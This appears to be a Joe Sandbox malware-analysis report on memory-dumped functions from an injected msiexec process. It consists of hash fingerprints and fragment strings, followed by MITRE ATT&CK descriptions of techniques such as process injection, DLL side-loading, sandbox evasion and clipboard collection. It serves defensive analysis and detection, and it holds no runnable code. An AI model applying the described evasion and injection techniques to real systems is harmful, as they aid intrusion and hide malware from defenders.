Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID: 0~$$0~$
API String ID: 0-2655890719
Opcode ID: 825ae66652e9321233381f19519cd5e9a4bc0dbf5b6862653e48e9d45cefa3dd
Instruction ID: 4de65c353884a567083a7f066919bc3b88e184c00ef7b1e0e0daf5cf9e7a02c5
Opcode Fuzzy Hash: 825ae66652e9321233381f19519cd5e9a4bc0dbf5b6862653e48e9d45cefa3dd
Instruction Fuzzy Hash: FD212532341A128FE3169A25D49592ABBA7EFC4655B1585B8EA07DB344CE34DC02C7C0

Function 24E6A650 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

(o^q, xrefs: 24E6A7D9

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: 6de1eabfe1fb175aae2f87db96ded5b272b0bf679be7df6a2ef06852079a1057
Instruction ID: e4610f7633cc8a37615ddca21b6da5c29deed5b39399621a3b2cf2357a990434
Opcode Fuzzy Hash: 6de1eabfe1fb175aae2f87db96ded5b272b0bf679be7df6a2ef06852079a1057
Instruction Fuzzy Hash: D941BF36B102049FEB05AB69D855AAE7BB3EF89611F148469E506E7391CE359C02CBA0

Function 24E65A70 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

0~$, xrefs: 24E65AFA

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID: 0~$
API String ID: 0-3727434951
Opcode ID: 87cff6a3d0290fe7a7d2c8c6e876edbe8dca3ec363dc671bf58e6b8277e5e283
Instruction ID: 0f61e1851480f9b3ce51af28b06b0fb7ae7977fe490e32015b9205f4e7f8439a
Opcode Fuzzy Hash: 87cff6a3d0290fe7a7d2c8c6e876edbe8dca3ec363dc671bf58e6b8277e5e283
Instruction Fuzzy Hash: E21108313416128FE3195A29D89892EBBA7FFC4655B1541B8EA07DB350CF34DC0287C0

Function 24E65EA8 Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

1$, xrefs: 24E65EA8

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID: 1$
API String ID: 0-1997912652
Opcode ID: abf533d713d3dbef6764a157adec504f0785a306d3848894b023a837b91467b2
Instruction ID: 9795a1df812e997cfc6e3c8dc79186634bed94b1d8afb61a3f6515ff1dd068f1
Opcode Fuzzy Hash: abf533d713d3dbef6764a157adec504f0785a306d3848894b023a837b91467b2
Instruction Fuzzy Hash: 5BD02B702183410FC715EB70E4124443F37A7A0309B4086E4F5090A11AED7E1D454792

Function 24E6CEC7 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88039992f95913c69694f7177b094e8a3fbd5e38c63e7f24a08c69d7ab69915e
Instruction ID: 15ccb340cb09609b6040efdbb27e20124c0809be676b17b2cd44fb35b4389dcb
Opcode Fuzzy Hash: 88039992f95913c69694f7177b094e8a3fbd5e38c63e7f24a08c69d7ab69915e
Instruction Fuzzy Hash: 2851DF324A13038FE7063B29E1AC97FBBA4FB4F3277816D24F11FA10098B3A5095CA50

Function 24E6CED8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a6b02430641ca7d5d5cd30ff7cac580b8dbb321a2b9b7677e45671092a2c1f5
Instruction ID: 957208a02ea2c4c15882bc588d01f8c088ee3881cd1fbe55cf77aacfc7830662
Opcode Fuzzy Hash: 5a6b02430641ca7d5d5cd30ff7cac580b8dbb321a2b9b7677e45671092a2c1f5
Instruction Fuzzy Hash: 5C51C1324A13078FE7463B25E1AC97FBBA4FB4F3277806C24F51FA10198B3A5095CA50

Function 24E6CD10 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 282a9995eae309360d6b6b3c2874ffc7d4d7a7b9c99ff62e557128a0ca059ce9
Instruction ID: ce5245018e51d40bcfe821ea2e369e8d42c6bbade676250bc3850a1220faf19d
Opcode Fuzzy Hash: 282a9995eae309360d6b6b3c2874ffc7d4d7a7b9c99ff62e557128a0ca059ce9
Instruction Fuzzy Hash: C6518174E112189FDB48DFA9D9949DDBBF2FF89300F208169E809AB364DB31A901CF50

Function 24E638F9 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a5b2bbeffe307898499771d7e136eb2dbcb804bc383c33cb33e95295b8a10f
Instruction ID: f39c5f4d9605c460d04edc8485cd1b34364a24c771a57e48ae3e1a2b8adc1f44
Opcode Fuzzy Hash: 43a5b2bbeffe307898499771d7e136eb2dbcb804bc383c33cb33e95295b8a10f
Instruction Fuzzy Hash: 8451B275E01208CFDB09DFA9D49499DBBB2FF8D300F208469E819AB324DB35A946CF40

Function 24E63908 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c501ed57283dd69a067f0cbdfa3586b342951b8f7f769aa67b318f360273ee1
Instruction ID: f9aeda5bb0fa89d21d712d433e92885f012ac6e6b6061b64526de02137ec84e3
Opcode Fuzzy Hash: 9c501ed57283dd69a067f0cbdfa3586b342951b8f7f769aa67b318f360273ee1
Instruction Fuzzy Hash: 97519075E01208CFDB09DFA9D49099DBBB2FF8D300F209469E919AB364DB35A946CF50

Function 24E6CD21 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b59eb970deac757a71b282c156d6ff6523b9f379328963abf3838bdaab7a42d
Instruction ID: c1210a8061e10ffe7e33993fec1ddd9b8ffbee5c1f60e6d766a773667deb5a13
Opcode Fuzzy Hash: 9b59eb970deac757a71b282c156d6ff6523b9f379328963abf3838bdaab7a42d
Instruction Fuzzy Hash: D6518474E01218DFDB48DFAAD59499DBBF2FF89300F209169E419AB364DB30A945CF50

Function 24E62060 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 561ca42f13df107df1d1b017cfcb232cc461098452c5a190d9acd91fa07aeb5b
Instruction ID: ca85b0b0e021e82754dcf8c3b0f2cff6bcd1da76fcc80286d3c19cfbc0fbc396
Opcode Fuzzy Hash: 561ca42f13df107df1d1b017cfcb232cc461098452c5a190d9acd91fa07aeb5b
Instruction Fuzzy Hash: DA21F171A001059FCB15EF74C4909AE37A6EB9D268F10C01DD94A9B380DF39EE42CBD2

Function 24E6D218 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c0c0d6fc8a9467778f397ddc288e83fc3ce8e752e80c4a94c44dcffd2e27480
Instruction ID: c74a94445096174f8b8b466b002c790182a59cacd33add4ffd91fc1a545d6f64
Opcode Fuzzy Hash: 4c0c0d6fc8a9467778f397ddc288e83fc3ce8e752e80c4a94c44dcffd2e27480
Instruction Fuzzy Hash: CF214935A41209CFEB09DFB0D450AEDB7B2FB8A300F50A428D40173394CB399946CF65

Function 24E6D122 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31b79eec09046a606eb8f9c534ffb61fcaf3e4d6774f88481eaa1976d6af6f4f
Instruction ID: b39b71706e47926de5aea247264b840098994076e9f596654f844aabb7b80f29
Opcode Fuzzy Hash: 31b79eec09046a606eb8f9c534ffb61fcaf3e4d6774f88481eaa1976d6af6f4f
Instruction Fuzzy Hash: 50214331D50209DEDB01EFE9D804AECFBB5FF5A300F509629E51577254EB30AA8ACB80

Function 24E6215C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 325e92196b492f9848ab448bf778ba631eedfcd6e8e2dbbf4f63a1f80dded3c9
Instruction ID: be7b455a1041d3531b04a388158d56890fe1625cbe9e9a6efac8570064701b5e
Opcode Fuzzy Hash: 325e92196b492f9848ab448bf778ba631eedfcd6e8e2dbbf4f63a1f80dded3c9
Instruction Fuzzy Hash: F31189B2F442199FCB01DBF8DC008DEBBB1FF89210B208356D516BB151E6351906CBA1

Function 24E6D228 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bb51a541c0a1090f0c64d7bf0c5b172e12e675ad9155da5da144f10eb65cbdc
Instruction ID: 0ba28e469c30e94bf01ee426b2335adb54869fa04c37001ebe87f8f21f5d950c
Opcode Fuzzy Hash: 6bb51a541c0a1090f0c64d7bf0c5b172e12e675ad9155da5da144f10eb65cbdc
Instruction Fuzzy Hash: 5B211735A41208CFDB09DFB4D850AEEB7B2FB89300F509428D80573394DB39A941CF65

Function 24E61F61 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5698d96e0379b444e477aaef3b78b7f42c1fbd47e41b830d0dba4a2adabad174
Instruction ID: adfe8ad92e454a79e86fedf506f6f7e07989d1b6c32a1c1ab98dd03c8315ed8b
Opcode Fuzzy Hash: 5698d96e0379b444e477aaef3b78b7f42c1fbd47e41b830d0dba4a2adabad174
Instruction Fuzzy Hash: 2E2100B9D0420A8FDB41EFA8C9454EEBFF1FF09301F10526AE806B3210EB345A45CBA1

Function 24E61F08 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 175229f150cb6028ffe06a85e76a96f21df1d5930b0285dd7b271a444283181e
Instruction ID: 612dbaaaf59993d37e2cddb3be7504de628a7b15c5452e9e63fa33dd2f9dd9be
Opcode Fuzzy Hash: 175229f150cb6028ffe06a85e76a96f21df1d5930b0285dd7b271a444283181e
Instruction Fuzzy Hash: 2E2138B5D042098FDB02DFA8C5445EDBFF0FF4A315F1041AAD455B7254EB301945CB91

Function 24E65607 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73abf5610ebf9df13c610c7360fa8fc506af6eec6b4494810268d7c9a6fca594
Instruction ID: 7813afa116a9e088126b1c878dca0b7b2251e05a62d9e6535107289a4c278bdd
Opcode Fuzzy Hash: 73abf5610ebf9df13c610c7360fa8fc506af6eec6b4494810268d7c9a6fca594
Instruction Fuzzy Hash: 49012DB2B440146FEB018E55D810BEF3FA7DBC9351F14806AFA06DB244CA71CC01C791

Function 24E61F71 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a88db57609fb4b7607a9c46278bd530442861ed49f877f468981fb802ea4f8
Instruction ID: 4614a1090b9ff7417fa579bb900851feaf4d6cc955299264bd4480a0aaed0f41
Opcode Fuzzy Hash: e3a88db57609fb4b7607a9c46278bd530442861ed49f877f468981fb802ea4f8
Instruction Fuzzy Hash: D611C0B5D002098FDB41EFA8C9455EEBBF1FF49301F10516AE81AB2214EB345A85CFA1

Function 24E62010 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9503142c36afbb1fb8a58526d7bc3f8a69303b61b7b206fcbb80699816f2169
Instruction ID: cf1c02be19a1db7132e81b1283944ba25672e951b822cd6f2a87687cab65102e
Opcode Fuzzy Hash: d9503142c36afbb1fb8a58526d7bc3f8a69303b61b7b206fcbb80699816f2169
Instruction Fuzzy Hash: F5E0D836E2826757CB11EBB098060DDBB34EE92254B514A76D1A477141EB60961BC392

Function 24E62020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5305733d4b3251e1c938870e581c1596237759023424cccfb931f79a0befa7bb
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: 5305733d4b3251e1c938870e581c1596237759023424cccfb931f79a0befa7bb
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 24E6A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea12a2408de9d2ad90e398e06e115036085fa5d85f8032afb5c0fecee2e0c597
Instruction ID: a299123ae8034ca9bcc2a96d4110ec7776ffeb0cde438856b755d5c8f899648f
Opcode Fuzzy Hash: ea12a2408de9d2ad90e398e06e115036085fa5d85f8032afb5c0fecee2e0c597
Instruction Fuzzy Hash: 7DD0677BB410589FCB049F98E8409DDB7B6FB9C222B448126F916A3265C6359921DB50

Function 24E65EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8636694e7c576a7489312f347ae74b4e705cc1a10e1788200e6a719947296dd7
Instruction ID: eb4e43b02740e4e7ddbdf67d47c570978dfb051becdb7aba5cc19b54b74f2073
Opcode Fuzzy Hash: 8636694e7c576a7489312f347ae74b4e705cc1a10e1788200e6a719947296dd7
Instruction Fuzzy Hash: F6C012701043194BC555E775E955955775BE7E0302F409960B60E0A119DE7D3C8457A1

Non-executed Functions

Function 24E66880 Relevance: 5.3, Strings: 4, Instructions: 328COMMON

Download Yara Rule

Strings

(o^q, xrefs: 24E6697A
,bq, xrefs: 24E669F2
(o^q, xrefs: 24E66988
,bq, xrefs: 24E66A00

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: 414fba3d44be8ebb36b551029a57acc02a8cbd01d3a4b48b70631d6d763ffcab
Instruction ID: 03109fc5ab5556f3f827933a6fbf11260ab9c6ef5deb9f7df664517676dbc933
Opcode Fuzzy Hash: 414fba3d44be8ebb36b551029a57acc02a8cbd01d3a4b48b70631d6d763ffcab
Instruction Fuzzy Hash: A5D169B0A50109DFEB01CFA9C984A9DBFF6FF88B44F1580A5E916AB265D730ED41CB50

Function 24E66E68 Relevance: 10.5, Strings: 8, Instructions: 475COMMON

Download Yara Rule

Strings

,bq, xrefs: 24E672F8
(o^q, xrefs: 24E6701A
(o^q, xrefs: 24E67367
(o^q, xrefs: 24E66F7D
,bq, xrefs: 24E67308
(o^q, xrefs: 24E66F51
(o^q, xrefs: 24E66E96
(o^q, xrefs: 24E67377

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: a9c3f06ebd56275f447c8485132831bffd97ba50fd9972fcfa18660fe0ecc012
Instruction ID: f31914ae1a4971c1eb89535f3043211bb304988b09cceb733f85ac4b812d73c4
Opcode Fuzzy Hash: a9c3f06ebd56275f447c8485132831bffd97ba50fd9972fcfa18660fe0ecc012
Instruction Fuzzy Hash: CE125A70A406098FDB15CF69C885E9EBBF2FF48719F1085A9E91ADB261DB30ED41CB50

Function 24E66088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 24E6609E
\;^q, xrefs: 24E660BA
\;^q, xrefs: 24E660C6
\;^q, xrefs: 24E66094

Memory Dump Source

Source File: 00000006.00000002.2678100759.0000000024E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 24E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_24e60000_msiexec.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 064432c86b66410318da169772286ebe2b193684a723da265eea953e60b3c527
Instruction ID: 18adf8c58f2e34af7b4532de436a0f79953e9ce57fb415896691dc87ca80de20
Opcode Fuzzy Hash: 064432c86b66410318da169772286ebe2b193684a723da265eea953e60b3c527
Instruction Fuzzy Hash: BB01B1B17A00149FDBA58E3CC444D0637EBAF88F65B2141BAE502CB3B1DA71DC418740

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

